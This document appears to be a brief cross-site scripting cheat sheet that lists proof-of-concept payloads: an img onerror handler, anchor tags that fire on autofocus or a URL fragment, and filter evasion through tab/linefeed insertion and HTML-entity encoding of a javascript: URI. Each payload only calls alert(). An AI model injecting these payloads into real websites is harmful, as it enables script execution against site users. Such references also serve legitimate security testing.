XSS(Cross Site Scripting)

img tag onerror

<img src=x onerror="alert('XSS!')">

a tag onfocus

<a autofocus name="example" onfocus="alert('XSS!')" href="javascript:alert('XSS!')">_</a>
<a name="example" onfocus="alert('XSS!')" href="javascript:alert('XSS!')">_</a> <!-- https://target.com/#example -->

URI normalization

<!-- Insert TAB(&#9;) or LineFeed(&#10;) -->
<a href="j	avascript:a
lert(1);">Click Me!</a>

<!-- Insert HTML Entity(Encoded "javascript:alert(1);") -->
<a href="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x3b;">Click Me!</a>

results matching ""

No results matching ""